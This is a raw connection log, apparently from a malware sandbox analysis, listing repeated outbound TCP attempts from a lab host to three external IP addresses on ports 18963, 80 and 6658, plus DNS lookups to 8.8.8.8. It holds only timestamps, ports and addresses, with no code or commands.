          Feb 17, 2022 20:23:21.614084959 CET4979180192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:24.555761099 CET4978918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:24.558166027 CET4979018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:24.743321896 CET4979180192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:25.465820074 CET4979218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:25.579066992 CET4979318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:25.709443092 CET4979480192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:28.478003979 CET4979218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:28.587354898 CET4979318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:28.712347984 CET4979480192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:29.511503935 CET4979518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:29.625524044 CET4979618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:29.902740002 CET4979780192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:32.525197983 CET4979518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:32.634592056 CET4979618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:32.993959904 CET4979780192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:33.043796062 CET497986658192.168.2.5107.163.56.251
          Feb 17, 2022 20:23:33.683917999 CET4979918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:33.819241047 CET4980018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:33.942368031 CET4980180192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:36.056772947 CET497986658192.168.2.5107.163.56.251
          Feb 17, 2022 20:23:36.697422981 CET4979918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:36.994314909 CET4980180192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:36.994333982 CET4980018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:37.684039116 CET4980218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:38.016088963 CET4980718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:38.068542004 CET4980880192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:40.697730064 CET4980218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:41.072796106 CET4980880192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:41.197796106 CET4980718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:41.903321981 CET4981118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:41.948524952 CET4981280192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:41.965219021 CET4981318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:42.072838068 CET497986658192.168.2.5107.163.56.251
          Feb 17, 2022 20:23:45.073120117 CET4981118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:45.075928926 CET4981280192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:45.075931072 CET4981318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:45.909537077 CET4981418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:46.020782948 CET4981618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:46.098843098 CET4981780192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:49.073503017 CET4981418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:49.076312065 CET4981618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:49.261017084 CET4981780192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:50.329184055 CET4981818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:51.272985935 CET4981918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:51.469491959 CET4982080192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:53.370778084 CET4981818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:54.188404083 CET498216658192.168.2.5107.163.56.251
          Feb 17, 2022 20:23:54.357566118 CET4982218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:54.480392933 CET4982418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:54.570969105 CET4982580192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:57.199174881 CET498216658192.168.2.5107.163.56.251
          Feb 17, 2022 20:23:57.370992899 CET4982218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:57.550731897 CET4982418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:57.699208975 CET4982580192.168.2.5123.126.45.92
          Feb 17, 2022 20:23:58.373507977 CET4982618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:58.679655075 CET4982718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:23:58.731421947 CET4982880192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:01.386133909 CET4982618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:01.699575901 CET4982718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:01.902728081 CET4982880192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:02.421534061 CET4982918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:02.668710947 CET4983018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:02.742820978 CET4983180192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:03.199654102 CET498216658192.168.2.5107.163.56.251
          Feb 17, 2022 20:24:05.590480089 CET4982918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:05.699891090 CET4983018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:05.847337961 CET4983180192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:06.436528921 CET4984118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:07.264720917 CET4984418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:07.704483986 CET4984580192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:09.575186968 CET4984118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:10.372126102 CET4984418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:10.457274914 CET4985218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:10.741727114 CET4985318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:11.102328062 CET4985580192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:13.575498104 CET4985218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:13.763091087 CET4985318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:14.263128996 CET4985580192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:14.516737938 CET4986418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:14.814464092 CET4986518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:15.181761026 CET4986680192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:15.381655931 CET498676658192.168.2.5107.163.56.251
          Feb 17, 2022 20:24:17.591502905 CET4986418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:17.904047012 CET4986518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:18.200900078 CET4986680192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:18.372850895 CET498676658192.168.2.5107.163.56.251
          Feb 17, 2022 20:24:18.549974918 CET4987118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:18.666249990 CET4987218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:18.711308002 CET4987380192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:21.591855049 CET4987118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:21.763696909 CET4987380192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:21.763703108 CET4987218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:22.562903881 CET4987418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:22.967469931 CET4987518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:23.344778061 CET4987680192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:24.373366117 CET498676658192.168.2.5107.163.56.251
          Feb 17, 2022 20:24:25.576571941 CET4987418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:26.076587915 CET4987518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:26.373442888 CET4987680192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:26.613848925 CET4987718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:26.990613937 CET4987818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:27.030289888 CET4987980192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:29.764374018 CET4987718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:30.076895952 CET4987980192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:30.077142954 CET4987818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:30.626754045 CET4988018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:30.911830902 CET4988118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:31.275247097 CET4988280192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:33.764740944 CET4988018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:34.077255011 CET4988118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:34.264800072 CET4988280192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:34.674209118 CET4988418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:35.002455950 CET4988518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:35.052783966 CET4988680192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:36.489506006 CET498876658192.168.2.5107.163.56.251
          Feb 17, 2022 20:24:37.780664921 CET4988418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:38.077548981 CET4988518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:38.077568054 CET4988680192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:38.660480022 CET4988818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:38.776281118 CET4988918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:38.851147890 CET4989080192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:39.499593973 CET498876658192.168.2.5107.163.56.251
          Feb 17, 2022 20:24:41.656023026 CET4988818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:41.765378952 CET4988918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:41.859126091 CET4989080192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:42.800327063 CET4989118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:43.464385033 CET4989218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:43.622086048 CET4989380192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:45.640724897 CET498876658192.168.2.5107.163.56.251
          Feb 17, 2022 20:24:45.828238964 CET4989118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:46.625217915 CET4989380192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:46.625247955 CET4989218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:47.735678911 CET4989418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:47.785954952 CET4989518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:48.176073074 CET4989680192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:50.826800108 CET4989418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:50.826812983 CET4989518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:51.232749939 CET4989680192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:51.744332075 CET4989818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:51.887243032 CET4990018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:52.067465067 CET4990180192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:54.930258989 CET4989818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:54.930273056 CET4990018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:55.140283108 CET4990180192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:55.746957064 CET4990718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:55.863857985 CET4990818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:56.214493990 CET4990980192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:58.031186104 CET499106658192.168.2.5107.163.56.251
          Feb 17, 2022 20:24:58.774265051 CET4990718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:58.977416039 CET4990818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:24:59.274315119 CET4990980192.168.2.5123.126.45.92
          Feb 17, 2022 20:24:59.807918072 CET4991118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:00.117471933 CET4991218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:00.678340912 CET4991380192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:01.040067911 CET499106658192.168.2.5107.163.56.251
          Feb 17, 2022 20:25:02.977703094 CET4991118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:03.165194035 CET4991218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:03.774616957 CET4991380192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:03.829505920 CET4991518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:03.942967892 CET4991618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:04.011285067 CET4991780192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:06.993666887 CET4991518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:06.993685961 CET4991618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:07.040534973 CET499106658192.168.2.5107.163.56.251
          Feb 17, 2022 20:25:07.165548086 CET4991780192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:07.875799894 CET4991818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:07.972696066 CET4991918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:08.044715881 CET4992080192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:10.978391886 CET4991818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:10.978413105 CET4991918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:11.165925980 CET4992080192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:11.919881105 CET4992118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:12.036312103 CET4992218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:12.341052055 CET4992380192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:14.978683949 CET4992118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:15.166222095 CET4992218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:15.478790045 CET4992380192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:15.950455904 CET4992418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:16.071641922 CET4992518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:16.160984993 CET4992680192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:18.979072094 CET4992418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:19.088430882 CET4992518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:19.291598082 CET4992680192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:20.591011047 CET4992718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:20.592607975 CET499286658192.168.2.5107.163.56.251
          Feb 17, 2022 20:25:20.669766903 CET4992980192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:20.722137928 CET4993018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:23.666922092 CET4992718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:23.745054960 CET499286658192.168.2.5107.163.56.251
          Feb 17, 2022 20:25:23.776281118 CET4993018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:23.776300907 CET4992980192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:24.607819080 CET4993118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:24.727201939 CET4993218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:24.796541929 CET4993380192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:27.667239904 CET4993118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:27.776635885 CET4993218963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:27.979801893 CET4993380192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:28.638705015 CET4993418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:28.754245996 CET4993518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:29.015666962 CET4993680192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:29.745541096 CET499286658192.168.2.5107.163.56.251
          Feb 17, 2022 20:25:31.667618990 CET4993418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:31.776989937 CET4993518963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:32.042663097 CET4993680192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:32.702909946 CET4993718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:32.852785110 CET4993818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:33.015381098 CET4993980192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:35.746114016 CET4993718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:35.933563948 CET4993818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:36.042979956 CET4993980192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:36.749684095 CET4994018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:36.881827116 CET4994118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:36.923110008 CET4994280192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:39.840225935 CET4994018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:40.043349028 CET4994280192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:40.046036005 CET4994118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:40.766527891 CET4994318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:40.883513927 CET4994418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:41.254756927 CET4994580192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:41.953624964 CET499466658192.168.2.5107.163.56.251
          Feb 17, 2022 20:25:43.922868013 CET4994418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:43.922916889 CET4994318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:44.340583086 CET4994580192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:44.848783970 CET4994718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:44.965606928 CET499466658192.168.2.5107.163.56.251
          Feb 17, 2022 20:25:44.997997999 CET4994818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:45.089612007 CET4994980192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:47.856458902 CET4994718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:48.012763023 CET4994818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:48.090863943 CET4994980192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:48.858859062 CET4995018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:48.977242947 CET4995118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:49.064718962 CET4995280192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:50.981703997 CET499466658192.168.2.5107.163.56.251
          Feb 17, 2022 20:25:51.872447968 CET4995018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:51.981802940 CET4995118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:52.091197014 CET4995280192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:52.927772999 CET4995318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:53.054955959 CET4995418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:53.089385986 CET4995580192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:56.107233047 CET4995580192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:56.107268095 CET4995318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:56.107312918 CET4995418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:56.969527006 CET4995618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:57.325937033 CET4995718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:25:57.374577999 CET4995880192.168.2.5123.126.45.92
          Feb 17, 2022 20:25:59.982522011 CET4995618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:00.326272011 CET4995718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:00.388794899 CET4995880192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:00.976614952 CET4995918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:01.087939978 CET4996018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:01.161637068 CET4996180192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:03.112797976 CET499626658192.168.2.5107.163.56.251
          Feb 17, 2022 20:26:03.982810020 CET4995918963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:04.092202902 CET4996018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:04.170336962 CET4996180192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:04.986397028 CET4996318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:05.108376980 CET4996418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:05.163552999 CET4996580192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:06.123689890 CET499626658192.168.2.5107.163.56.251
          Feb 17, 2022 20:26:07.998776913 CET4996318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:08.123786926 CET4996418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:08.170721054 CET4996580192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:09.019865036 CET4996718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:09.133142948 CET4996818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:09.500267982 CET4996980192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:12.030407906 CET4996718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:12.124108076 CET499626658192.168.2.5107.163.56.251
          Feb 17, 2022 20:26:12.139751911 CET4996818963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:12.514843941 CET4996980192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:13.017371893 CET4997018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:13.132905006 CET4997118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:13.491718054 CET4997280192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:16.030719042 CET4997018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:16.140110970 CET4997118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:16.499480963 CET4997280192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:17.069417953 CET4997318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:17.225172997 CET4997418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:17.240720987 CET4997580192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:20.077919006 CET4997318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:20.234180927 CET4997418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:20.249789953 CET4997580192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:21.079823017 CET4997618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:21.197877884 CET4997718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:21.549209118 CET4997880192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:24.093892097 CET4997618963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:24.203301907 CET4997718963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:24.562726974 CET4997880192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:24.925029039 CET499796658192.168.2.5107.163.56.251
          Feb 17, 2022 20:26:25.111954927 CET4998018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:25.294596910 CET4998118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:25.336426973 CET4998280192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:27.937920094 CET499796658192.168.2.5107.163.56.251
          Feb 17, 2022 20:26:28.266117096 CET4998018963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:28.453622103 CET4998118963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:28.454545975 CET4998280192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:29.113867044 CET4998318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:29.230367899 CET4998418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:29.771018982 CET4998580192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:32.125777960 CET4998318963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:32.235177040 CET4998418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:32.782140970 CET4998580192.168.2.5123.126.45.92
          Feb 17, 2022 20:26:33.938463926 CET499796658192.168.2.5107.163.56.251
          Feb 17, 2022 20:26:38.251336098 CET4998418963192.168.2.5107.163.56.232
          Feb 17, 2022 20:26:38.313864946 CET4998318963192.168.2.5107.163.56.232
          TimestampSource PortDest PortSource IPDest IP
          Feb 17, 2022 20:22:56.503609896 CET5959653192.168.2.58.8.8.8
          Feb 17, 2022 20:22:56.820297003 CET53595968.8.8.8192.168.2.5
          Feb 17, 2022 20:22:57.484842062 CET6529653192.168.2.58.8.8.8
          Feb 17, 2022 20:22:57.803123951 CET53652968.8.8.8192.168.2.5
          Feb 17, 2022 20:23:01.320740938 CET6318353192.168.2.58.8.8.8
          Feb 17, 2022 20:23:01.640818119 CET53631838.8.8.8192.168.2.5
          Feb 17, 2022 20:23:05.332601070 CET6015153192.168.2.58.8.8.8
          Feb 17, 2022 20:23:05.654016018 CET53601518.8.8.8192.168.2.5
          Feb 17, 2022 20:23:09.397387981 CET5696953192.168.2.58.8.8.8
          Feb 17, 2022 20:23:09.416057110 CET53569698.8.8.8192.168.2.5
          Feb 17, 2022 20:23:13.562412977 CET5475753192.168.2.58.8.8.8
          Feb 17, 2022 20:23:13.881606102 CET53547578.8.8.8192.168.2.5
          Feb 17, 2022 20:23:17.551609993 CET4999253192.168.2.58.8.8.8
          Feb 17, 2022 20:23:17.568496943 CET53499928.8.8.8192.168.2.5
          Feb 17, 2022 20:23:21.592600107 CET5501653192.168.2.58.8.8.8
          Feb 17, 2022 20:23:21.611524105 CET53550168.8.8.8192.168.2.5
          Feb 17, 2022 20:23:25.689045906 CET6434553192.168.2.58.8.8.8
          Feb 17, 2022 20:23:25.707355022 CET53643458.8.8.8192.168.2.5
          Feb 17, 2022 20:23:29.658852100 CET5712853192.168.2.58.8.8.8
          Feb 17, 2022 20:23:29.900372028 CET53571288.8.8.8192.168.2.5
          Feb 17, 2022 20:23:33.902399063 CET5479153192.168.2.58.8.8.8
          Feb 17, 2022 20:23:33.921515942 CET53547918.8.8.8192.168.2.5
          Feb 17, 2022 20:23:38.045717955 CET5853053192.168.2.58.8.8.8
          Feb 17, 2022 20:23:38.064519882 CET53585308.8.8.8192.168.2.5
          Feb 17, 2022 20:23:41.927798986 CET5381353192.168.2.58.8.8.8
          Feb 17, 2022 20:23:41.946727037 CET53538138.8.8.8192.168.2.5
          Feb 17, 2022 20:23:46.079430103 CET6373253192.168.2.58.8.8.8
          Feb 17, 2022 20:23:46.096263885 CET53637328.8.8.8192.168.2.5
          Feb 17, 2022 20:23:51.401515007 CET5734453192.168.2.58.8.8.8
          Feb 17, 2022 20:23:51.420788050 CET53573448.8.8.8192.168.2.5
          Feb 17, 2022 20:23:54.518117905 CET5445053192.168.2.58.8.8.8
          Feb 17, 2022 20:23:54.534945965 CET53544508.8.8.8192.168.2.5
          Feb 17, 2022 20:23:58.709542036 CET5926153192.168.2.58.8.8.8
          Feb 17, 2022 20:23:58.728400946 CET53592618.8.8.8192.168.2.5
          Feb 17, 2022 20:24:02.723436117 CET5715153192.168.2.58.8.8.8
          Feb 17, 2022 20:24:02.740253925 CET53571518.8.8.8192.168.2.5
          Feb 17, 2022 20:24:07.335109949 CET5164953192.168.2.58.8.8.8
          Feb 17, 2022 20:24:07.662615061 CET53516498.8.8.8192.168.2.5
          Feb 17, 2022 20:24:10.779923916 CET6508653192.168.2.58.8.8.8
          Feb 17, 2022 20:24:11.099441051 CET53650868.8.8.8192.168.2.5
          Feb 17, 2022 20:24:14.845992088 CET5643253192.168.2.58.8.8.8
          Feb 17, 2022 20:24:15.167742014 CET53564328.8.8.8192.168.2.5
          Feb 17, 2022 20:24:18.691988945 CET5292953192.168.2.58.8.8.8
          Feb 17, 2022 20:24:18.708914042 CET53529298.8.8.8192.168.2.5
          Feb 17, 2022 20:24:23.020622969 CET6431753192.168.2.58.8.8.8
          Feb 17, 2022 20:24:23.340293884 CET53643178.8.8.8192.168.2.5
          Feb 17, 2022 20:24:27.010618925 CET6100453192.168.2.58.8.8.8
          Feb 17, 2022 20:24:27.027789116 CET53610048.8.8.8192.168.2.5
          Feb 17, 2022 20:24:30.955777884 CET5689553192.168.2.58.8.8.8
          Feb 17, 2022 20:24:31.272394896 CET53568958.8.8.8192.168.2.5
          Feb 17, 2022 20:24:35.032768965 CET6151553192.168.2.58.8.8.8
          Feb 17, 2022 20:24:35.049979925 CET53615158.8.8.8192.168.2.5
          Feb 17, 2022 20:24:38.826637030 CET5667553192.168.2.58.8.8.8
          Feb 17, 2022 20:24:38.845635891 CET53566758.8.8.8192.168.2.5
          Feb 17, 2022 20:24:43.578985929 CET5717253192.168.2.58.8.8.8
          Feb 17, 2022 20:24:43.597493887 CET53571728.8.8.8192.168.2.5
